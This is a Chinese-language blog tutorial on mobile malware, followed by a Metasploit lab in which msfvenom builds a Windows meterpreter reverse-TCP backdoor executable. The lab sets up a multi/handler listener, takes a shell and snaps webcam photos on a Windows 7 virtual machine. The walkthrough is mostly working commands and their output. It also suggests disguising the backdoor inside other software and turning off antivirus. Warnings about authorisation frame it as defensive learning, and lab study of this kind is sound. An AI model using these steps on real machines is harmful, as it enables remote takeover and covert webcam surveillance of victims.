MSF惡意程序利用【實戰】

★關於道德倫理的忠告★

關於一些網絡安全實戰內容,我還是不厭其煩的寫上這些忠告,請見諒。

以下內容摘自《Metasploit滲透測試指南》

作爲一名滲透測試者,我們可以擊敗安全防禦機制,但這是僅僅是我們工作的一部分。當你進行滲透攻擊時,請記住如下的忠告:

  • 不要進行惡意的攻擊;

  • 不要做傻事;

  • 在沒有獲得書面授權時,不要攻擊任何目標;

  • 考慮你的行爲將會帶來的後果;

  • 如果你幹了些非法的事情,天網恢恢疏而不漏,你總會被抓到牢裏的。

1、手機惡意應用程序分析

1.1、手機惡意應用程序理解

手機惡意應用程序:一般是指在用戶不完全知情和認可(它包括未經用戶許可、強迫引導用戶許可或隱瞞關鍵信息等)的情況下強行安裝到用戶手機中,或者一旦安裝就無法正常卸載和刪除,但又具備一定正常功能的軟件程序。它是介於病毒和正常軟件之間的軟件,它與病毒的區別是:一般還具備一定的正常功能。

1.2、危害性

惡意程序中植入的木馬程序 ,可在用戶不知情的情況下 ,收集用戶個人隱私信息、惡意扣費 。

1.3、如何實現?

很多APP由於存在大量安全漏洞和缺乏安全措施,被不法分子二次打包後,或被直接仿冒,或植入廣告、惡意代碼,甚至加入違法內容,重新投放應用市場,嚴重危害用戶隱私與財產安全,網絡“黑產”鏈條也開始滋生 。

1.4、“官方”八招對付

八招對付惡意軟件【來源於人民日報】:

1、選擇官方渠道下載

2、關注流量使用

3、謹慎ROOT

4、注意權限信息

5、安裝防病毒軟件

6、不要在未知安全性的WIFI網絡中上網

7、及時止損

8、及時舉報

2、MSF惡意程序利用

2.0、說明

因爲手機惡意程序利用的實驗,我自己沒有驗證過就暫不做分享,以win7實驗做爲示例。

2.1、製作window惡意獲取shell

後門的生成是爲了更好的理解滲透過程中的方法以及途徑,進而達到更好的防護,而不是利用技巧去做攻擊等不合理的行爲

思路:利用社會工程學中人的心理,爲某些軟件利用msf生成一些後門程序,進而通過帶有後門的軟件實現滲透獲取shell 。

2.1.1、簡介

msfvenom是一個Metasploit獨立的有效負載生成器,也是msfpayload和msfencode的替代品。是用來生成後門的軟件。

實驗內容:
製作Windows惡意軟件獲取shell,msfvenom的shell在windows中的使用 msfvenom生成shell.exe

2.1.2、實驗步驟

2.1.2.1、實驗環境

kali-linux系統,版本:Linux kali 5.10.0-kali9-amd64,IP:192.168.242.4

win7系統,IP:192.168.242.6

2.1.2.2、生成後門軟件

在kali系統生成後門軟件,然後先複製到外面(本機),再複製到目標系統win7

msfvenom -p 添加載荷payload LHOST=監聽的IP LPORT=監聽的端口,只要不佔用即可 -f 輸出文件格式 > 目標文件的名稱

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.242.4 LPORT=6060 -f exe > msftest.exe

注意:該步驟自己電腦的殺毒軟件和防火牆需要暫時關閉,如果不想關閉的話,可以利用ms17-010漏洞上傳文件到win7電腦,可以參考我前面寫的《滲透測試實戰-漏洞利用MS17-010》

2.1.2.3、啓動偵聽

在kali系統操作

# 啓動metaspliot
msfconsole

# 啓動成功結果--每次的圖案不一樣,主要關注下面的是否有msf6>  即表示成功
Metasploit tip: Save the current environment with the 
save command, future console restarts will use this 
environment again

msf6 > 

# metasploit設置偵聽 加載模塊
msf6 > use exploit/multi/handler

# 引用成功結果 ,再在後面
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > 

# 設置payload
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

#設置kali的IP
msf6 exploit(multi/handler) > set lhost kali的ip

#設置kali的端口lport =6060,也就是生成後門的端口
msf6 exploit(multi/handler) > set lport 6060

#執行
msf6 exploit(multi/handler) > exploit 或者 run

# 結果
[*] Started reverse TCP handler on 192.168.242.4:6060 

2.1.2.4、win7系統雙擊後門軟件

win7系統雙擊後門軟件,然後觀察kali系統會看到有對應信息串聯起來,效果如下

[*] Sending stage (175174 bytes) to 192.168.242.6
[*] Meterpreter session 1 opened (192.168.242.4:6060 -> 192.168.242.6:2327) at 2023-09-11 11:07:36 -0400


2.1.2.4、操作命令控制win7系統
# 輸入命令行
meterpreter > shell

# 連接成功
Process 8856 created.
Channel 1 created.

# 退出當前操作
exit

# 可進行拍照,只要目標系統有拍照功能
# 查看攝像頭
meterpreter > webcam_list
# 結果表示有
1: Integrated Camera

# 通過攝像頭拍照
meterpreter > webcam_snap

3、資料獲取

如果需要kali和win7系統虛擬機,進行實驗的話(如果在滲透測試實戰已有下載過,不需要再下載了),請關注我的公衆號:大象只爲你,後臺回覆:虛擬機。文件有些大下載耗時會比較久。

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章